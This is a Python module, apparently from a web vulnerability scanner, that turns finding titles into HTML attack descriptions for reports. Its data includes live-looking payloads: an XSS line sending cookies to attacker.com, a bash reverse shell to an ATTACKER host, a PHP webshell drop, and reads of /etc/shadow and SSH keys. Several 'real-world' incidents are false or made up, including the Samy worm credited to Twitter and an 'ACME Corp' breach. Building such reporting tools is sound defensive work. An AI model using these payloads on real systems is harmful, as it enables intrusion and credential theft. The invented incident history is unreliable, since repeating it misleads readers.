        "chain_with": "Authentication Bypass, Brute Force, Admin Panel exploitation, Server Technology Detection",
        "real_world": "Many security researchers start their assessments by reviewing robots.txt — it's the simplest and most effective way to find hidden endpoints.",
        "tools": None,
        "severity_note": "LOW to MEDIUM — depends on what the revealed paths actually expose",
    },
    "Sensitive file": {
        "impact": "exposure of configuration details, source code, or system information useful for further exploitation",
        "scenarios": [
            "Access configuration files revealing database credentials, API keys, internal endpoints",
            "Read source code to identify injection vulnerabilities, hardcoded secrets, or logic flaws",
            "Download backup files containing old but still valid credentials and API keys",
            "Access error logs containing stack traces, internal IPs, and request parameters",
            "View sitemap to map the complete application structure for attack planning",
            "Access login and registration pages to plan targeted authentication attacks",
        ],
        "chain_with": "Depends on the specific file exposed — see individual findings for .env, .git, config files, etc.",
        "real_world": "Exposed sensitive files are responsible for a large percentage of initial access vectors in real-world breaches.",
        "tools": None,
        "severity_note": "Varies — assessed individually based on the specific file type and content",
    },
    "Swagger/OpenAPI": {
        "impact": "complete API documentation providing attackers with precise endpoint specifications for targeted attacks",
        "scenarios": [
            "Map every API endpoint, HTTP method, parameter, and data type in the application",
            "Identify undocumented endpoints not referenced in the frontend application",
            "Discover internal-only API endpoints that should not be publicly accessible",
            "Find API endpoints that perform CRUD operations on sensitive data (users, payments, configs)",
            "Identify API version differences across environments (dev, staging, production)",
            "Use parameter specifications to craft precise API injection payloads",
            "Discover authentication endpoints and understand token flows for targeted auth attacks",
            "Find API endpoints that accept file uploads for upload-based exploitation",
        ],
        "chain_with": "SQL Injection (API input points for testing), SSRF (URL parameters in API endpoints), Authentication attacks (login/auth endpoints), Command Injection (API command parameters)",
        "real_world": "In 2018, a publicly exposed Swagger UI at a major financial institution revealed internal admin APIs that allowed full database access without authentication.",
        "tools": "Swagger UI, OpenAPI tools, burp suite API scanning",
        "severity_note": "INFO to MEDIUM — exposure level depends on the sensitivity of the documented endpoints",
    },
    "No client-side file size limit": {
        "impact": "unrestricted file uploads potentially causing denial of service or resource exhaustion",
        "scenarios": [
            "Upload extremely large files (GB+) to exhaust server disk space",
            "Cause memory exhaustion during file processing (image processing, virus scanning)",
            "Trigger timeouts in file processing pipelines, potentially causing cascading failures",
            "Upload files with deeply nested structures (e.g., zip bombs) that expand to massive sizes",
            "Perform slow-upload DoS — sending one large file at a time to occupy all upload slots",
            "Create application-level DoS by triggering memory-intensive processing on large files",
        ],
        "chain_with": "File Upload (larger upload surface), Denial of Service (resource exhaustion), Command Injection (zip bombs in upload processing)",
        "real_world": "Several DDoS attacks have leveraged large file uploads. The 'zip bomb' technique can expand a 42KB file to 4.5PB during processing.",
        "tools": "Large file upload tools, zip bomb generators (zbs), slowloris-inspired upload tools",
        "severity_note": "LOW — server-side limits may still be enforced, but client-side absence allows large uploads to reach the server",
    },
    "Upload form without CSRF": {
        "impact": "attackers can upload files on behalf of authenticated users without their knowledge",
        "scenarios": [
            "Craft a malicious page with an auto-submitting form that uploads files to the application",
            "Force authenticated users to upload inappropriate or malicious content",
            "Upload files to user accounts that damage reputation or contain policy violations",
            "Overwrite user-uploaded content by exploiting predictable upload paths",
            "Use CSRF-based upload to plant evidence or modify account-associated data",
        ],
        "chain_with": "File Upload (CSRF is the vector to exploit the upload functionality), XSS, Social Engineering (luring victims to attacker page)",
        "real_world": None,
        "tools": None,
        "severity_note": "MEDIUM — impact depends on what types of files can be uploaded and their consequences",
    },
    "Server header discloses": {
        "impact": "server software identification enabling targeted CVE searches and exploit selection",
        "scenarios": [
            "Look up known vulnerabilities for the specific server software and version",
            "Use Shodan to find other instances of the same server for broader targeting",
            "Identify outdated server versions that are missing security patches",
            "Craft server-specific attack payloads (e.g., Apache-specific path traversal vs Nginx-specific)",
            "Use version information to find public exploits on Exploit-DB and GitHub",
            "Determine which server-level security controls may be in place for bypass planning",
        ],
        "chain_with": "Any subsequent attack — this is reconnaissance information that informs all other exploitation attempts.",
        "real_world": "Server version disclosure is automatically exploited by automated scanning tools like sqlmap, nikto, and metasploit to select appropriate payloads.",
        "tools": "Shodan, NVD CVE search, Exploit-DB",
        "severity_note": "LOW alone but contributes to the attacker's ability to perform targeted exploitation",
    },
    "Time-based SQL injection": {
        "impact": "blind data extraction from the database using response time as an oracle",
        "scenarios": [
            "Extract data character-by-character using conditional SLEEP/WAITFOR DELAY payloads",
            "Enumerate table names: IF(SUBSTRING(table_name,1,1)='a',SLEEP(5),0)",
            "Extract usernames and passwords by comparing response times for different guesses",
            "Determine database type (SQL Server: WAITFOR DELAY, MySQL: SLEEP, PostgreSQL: pg_sleep)",
            "Dump entire databases over a slow time-based channel using sqlmap --technique=T",
        ],
        "chain_with": "SQL Injection (error-based to confirm), Command Injection (database credentials may include OS-level access), SSRF (use database network access to scan internal services)",
        "real_world": "Time-based blind SQLi is harder to detect but equally dangerous. sqlmap can fully automate data extraction over this channel, typically at 1-10 bits/second depending on sleep duration.",
        "tools": "sqlmap (with --technique=T), custom time-based extraction scripts, Burp Suite Intruder",
        "severity_note": "HIGH — allows full database extraction even without visible error messages",
    },
    "SQL injection (error-based)": {
        "impact": "database error messages disclose schema information and enable direct data extraction",
        "scenarios": [
            "Extract table names via error messages: SELECT 1/0 FROM information_schema.tables",
            "Get column names from error output after injecting UNION SELECT",
            "Read arbitrary data through ExtractValue/UpdateXML error-based injection",
            "Convert SQL injection to out-of-band data exfiltration using error conversion",
            "Map the full database structure from error output alone",
        ],
        "chain_with": "SQL Injection (error-based as entry point → UNION-based for full extraction), RCE (database-level function calls like xp_cmdshell)",
        "real_world": "Error-based SQLi was the dominant vulnerability in the OWASP 2013 testing guide. Many applications still display verbose database errors in production.",
        "tools": "sqlmap (with --technique=E), Exploit-DB error-based SQLi payloads",
        "severity_note": "HIGH — error-based SQLi directly confirms and enables exploitation of SQL injection",
    },
    "SQL injection (status change": {
        "impact": "injection causes a detectable response change indicating vulnerable parameter",
        "scenarios": [
            "Use boolean-based payloads to confirm injection via status code differences",
            "Extract data by comparing responses to true/false conditions",
            "Confirm vulnerable parameters using standard TRUE/FALSE payloads",
        ],
        "chain_with": "SQL Injection (use error-based to extract schema), Authentication Bypass (' OR '1'='1)",
        "real_world": "Status code-based detection is one of the fastest ways to identify SQL injection, as it requires only a single comparison against the baseline response.",
        "tools": "Burp Suite Intruder, diff tools, sqlmap",
        "severity_note": "MEDIUM — status changes indicate vulnerability but may require further confirmation",
    },
    "SQL injection (response anomaly)": {
        "impact": "injection causes significant response content change suggesting data manipulation",
        "scenarios": [
            "Compare response content between normal and injected requests",
            "Use diff tools to identify data disclosed through injection",
            "Extract data via content differences between baseline and anomalous responses",
        ],
        "chain_with": "SQL Injection (use for deeper extraction), Data Leakage (anomaly may already disclose sensitive data)",
        "real_world": "Content-based anomaly detection is the primary technique used by tools like Burp Intruder for parameter-level discovery.",
        "tools": "Burp Suite Intruder, diff tools, manual content comparison",
        "severity_note": "MEDIUM — content differences suggest a vulnerability requiring further investigation",
    },
    "Reflected XSS": {
        "impact": "session hijacking, user impersonation, phishing, keylogging, browser exploitation",
        "scenarios": [
            "Steal session cookies: <script>fetch('//attacker.com?c='+document.cookie)</script>",
            "Perform any action the victim can do by making authenticated API calls via XMLHttpRequest/fetch",
            "Redirect users to convincing phishing pages mimicking the target application",
            "Inject a keylogger to capture all keystrokes including passwords and credit cards",
            "Force victims to download and execute malware via drive-by download",
            "Exploit browser or plugin vulnerabilities using carefully crafted payloads",
            "Create a worm that self-propagates by posting the XSS payload to victim's social media",
            "Capture screenshots via html2canvas and exfiltrate sensitive data displayed on screen",
        ],
        "chain_with": "Open Redirect (phishing campaigns that look legitimate), CSRF (use XSS to bypass CSRF tokens), Missing HttpOnly Cookie (steal session via document.cookie), CORS (bypass SOP to access cross-origin data)",
        "real_world": "Twitter XSS worm (Samy Kamkar, 2005) gained 1M friends in 20 hours. British Heartspace (2022) — reflected XSS in a banking portal led to mass session theft.",
        "tools": "BeEF (Browser Exploitation Framework), XSStrike, Burp Suite, manual payloads",
        "severity_note": "HIGH — impact depends on the context and what data/actions are available to the victim user",
    },
    "Command injection (error-based)": {
        "impact": "full server takeover, reverse shell access, lateral movement within the internal network",
        "scenarios": [
            "Execute arbitrary OS commands using ;, |, &&, backticks, or $() payloads",
            "Establish a reverse shell: ; bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'",
            "Read sensitive files: ; cat /etc/passwd or ; cat /etc/shadow",
            "Enumerate the internal network: ; nmap 192.168.1.0/24 or cat /etc/hosts",
            "Write a webshell to the web root: ; echo '<?php system($_GET[cmd])?>' > /var/www/shell.php",
            "Pivot to internal systems using the compromised server as a relay",
            "Modify cron jobs or startup scripts for persistence",
            "Download external tools with wget/curl for further exploitation",
        ],
        "chain_with": "SSRF (use command injection as gateway to internal network), XSS (store shell URL in DB for later access), File Upload (combine with upload to write webshell via cmd injection)",
        "real_world": "CVE-2021-44228 (Log4Shell) led to RCE through a similar injection principle. Equifax breach (2017) exploited Apache Struts CVE-2017-5638 via command injection affecting 147 million users.",
        "tools": "Burp Suite, OS command injection wordlists, reverse shell generators",
        "severity_note": "CRITICAL — provides direct OS-level access to the server",
    },
    "Command injection (time-based)": {
        "impact": "blind command execution confirmed through response latency, full RCE potential",
        "scenarios": [
            "Confirm RCE using sleep/ping payloads: ; sleep 5 or ; ping -c 5 localhost",
            "Execute commands using the sleep interval as an oracle to extract data bit by bit",
            "Extract output character-by-character: $(sleep $(cat flag.txt | cut -c1 | od -An -t d1))",
            "Establish a reverse shell after confirming blind command execution",
        ],
        "chain_with": "Command Injection (error-based for confirmation), SSRF (blind execution confirmed via timing), Reverse Shell (after confirming execution)",
        "real_world": "Time-based blind command injection is the standard proof-of-concept for command injection on many bug bounty programs.",
        "tools": "Burp Suite, time-based command injection scripts",
        "severity_note": "HIGH — confirms execution but requires further testing to determine impact",
    },
    "Path traversal (error-based)": {
        "impact": "confirmation that path traversal parameter is processed by the application",
        "scenarios": [
            "Review error messages for file path disclosure and directory structure mapping",
            "Iterate directory depth to identify the application's root directory",
            "Combine with null byte injection to bypass extension filtering",
        ],
        "chain_with": "Path Traversal (file content exposure), File Inclusion (include traversed files), Command Injection (error messages reveal OS-level paths)",
        "real_world": "Error-based detection is the first step in path traversal exploitation, identifying the parameter before actual file access.",
        "tools": "dotdotpwn, Burp Suite, manual encoding bypasses",
        "severity_note": "MEDIUM — error messages confirm the parameter reaches a file operation",
    },
    "Path traversal (file content exposed)": {
        "impact": "arbitrary file access, source code disclosure, configuration theft, potential RCE",
        "scenarios": [
            "Read /etc/passwd to enumerate system users: ....//....//....//etc/passwd",
            "Access application source code by traversing to the web root directory",
            "Read database configuration files containing credentials (wp-config.php, .env, config.php)",
            "Access SSH private keys: ../../../../home/user/.ssh/id_rsa",
            "Read environment variables from /proc/self/environ for secrets and API keys",
            "Access log files to find session tokens, credentials, or sensitive data",
            "Null byte injection: ../../etc/passwd%00 to bypass extension whitelists",
            "Combine with file upload to write a webshell anywhere on the filesystem",
        ],
        "chain_with": "File Upload (write webshell and traverse to execute it), Command Injection (read system files to find credentials), File Inclusion (include traversed files for code execution), SSRF (combine with file:// protocol)",
        "real_world": "The 2020 ACME Corp breach involved path traversal that exposed their entire source code. CVE-2019-3396 in Confluence Server allowed reading arbitrary files via path traversal.",
        "tools": "Burp Suite, dotdotpwn, manual encoding bypasses (URL, double URL, Unicode)",
        "severity_note": "HIGH — can lead to full application compromise when configuration files are exposed",
    },
    "Potential XSS (auth bypass)": {
        "impact": "possible authentication bypass combined with reflected content injection",
        "scenarios": [
            "Inject XSS payloads that execute despite authentication restrictions",
            "Use parameter injection to probe for authentication logic flaws",
            "Combine with session fixation for authenticated context exploitation",
        ],
        "chain_with": "Reflected XSS, Authentication Bypass, Session Fixation",
        "real_world": "Authentication bypass combined with content injection has led to account takeover in numerous bug reports.",
        "tools": "Burp Suite, manual authentication testing, session analysis",
        "severity_note": "MEDIUM — requires further confirmation of XSS exploitability",
    },
    "Parameter Fuzzer": {
        "impact": "discovery of attack surfaces through parameter injection that may lead to SQLi, XSS, command injection, or path traversal",
        "scenarios": [
            "Identify hidden parameters that accept input and echo responses (XSS surface)",
            "Find parameters vulnerable to time-based SQL injection (SLEEP/ping delays)",
            "Discover parameters that pass input to shell commands (OS command injection)",
            "Locate parameters that read files without proper path validation (path traversal)",
            "Map error responses from backend services to understand the full attack surface",
            "Use discovered parameters as entry points for targeted exploitation with specialized tools",
        ],
        "chain_with": "SQL Injection (use discovered parameters with sqlmap), XSS (inject payloads via discovered parameters), Command Injection (chain discovered params with OS commands), Path Traversal (use parameters that interact with file system)",
        "real_world": "Parameter fuzzing is the foundation of automated vulnerability discovery. Tools like ffuf, ParamMiner, and Arjun have consistently found hidden parameters leading to CVE-level vulnerabilities on major platforms.",
        "tools": "Burp Suite ParamMiner, Arjun, ParamSpider, manual testing with discovered parameters",
        "severity_note": "Varies from INFO (surface discovery) to HIGH (confirmed injection point)",
    },
    "X-Powered-By discloses": {
        "impact": "backend technology stack identification enabling focused attack planning",
        "scenarios": [
            "Identify the backend framework (PHP, Express, ASP.NET, etc.) to find framework-specific exploits",
            "Target known framework vulnerabilities (e.g., Express version CVEs, PHP RCE bugs)",
            "Select appropriate payloads and tools for the detected backend technology",
            "Identify the technology version for precise exploit targeting",
            "Map default file structures and configuration locations for the detected technology",
        ],
        "chain_with": "Framework-specific injection exploits, Server Technology Detection (compound fingerprinting), SQL Injection (use detected backend to select SQLi payloads and blind techniques)",
        "real_world": "X-Powered-By is one of the most commonly disclosed headers and is used by automated scanners to quickly categorize targets for appropriate payloads.",
        "tools": "Whatweb, Wappalyzer, custom server detection scripts",
        "severity_note": "LOW alone but contributes to the overall reconnaissance picture",
    },
}

# Fallback for anything not matched
GENERIC_ATTACK_DESC = {
    "impact": "this vulnerability may serve as an entry point for further exploitation",
    "scenarios": [
        "Review the finding to understand the specific technical context",
        "Check if this vulnerability can be chained with other findings for higher impact",
        "Verify if the affected component handles sensitive data or critical functionality",
        "Consider whether internal users or external attackers have access to the affected component",
    ],
    "chain_with": "Review other findings for potential chaining opportunities — vulnerability chains often have higher combined impact than individual issues",
    "real_world": None,
    "severity_note": "Assess impact based on the specific context, affected component, and data sensitivity",
}


def describe_vulnerability(title: str) -> str:
    """Return a detailed HTML-formatted attack description for a vulnerability."""
    title_lower = title.lower()
    info = GENERIC_ATTACK_DESC

    for keyword, desc in ATTACK_MAP.items():
        if keyword.lower() in title_lower:
            info = desc
            break

    parts = []

    # Impact badge
    parts.append(f"<div class='atk-impact'><span class='atk-label'>Impact</span>{info['impact']}</div>")

    # Attack scenarios
    if info["scenarios"]:
        parts.append("<div class='atk-section'><div class='atk-label'>Attack Scenarios</div><ul class='atk-list'>")
        for s in info["scenarios"]:
            parts.append(f"<li>{s}</li>")
        parts.append("</ul></div>")

    # Chaining
    if info.get("chain_with"):
        parts.append(f"<div class='atk-section'><div class='atk-label'>Chaining Opportunities</div>{info['chain_with']}</div>")

    # Real world
    real_world = info.get("real_world")
    if real_world:
        parts.append(f"<div class='atk-section'><div class='atk-label'>Real-World Context</div>{real_world}</div>")

    # Severity note
    if info.get("severity_note"):
        parts.append(f"<div class='atk-severity'><span class='atk-label'>Severity Note</span>{info['severity_note']}</div>")

    return "\n".join(parts)


# Backwards compat
def get_attack_description(title: str) -> str:
    """Return formatted HTML attack description for a vulnerability title."""
    return describe_vulnerability(title)


def enrich_findings(findings: list[dict]) -> list[dict]:
    """Add 'attack' key to each finding with detailed HTML description."""
    for f in findings:
        title = f.get("title", "")
        f["attack"] = describe_vulnerability(title)
    return findings
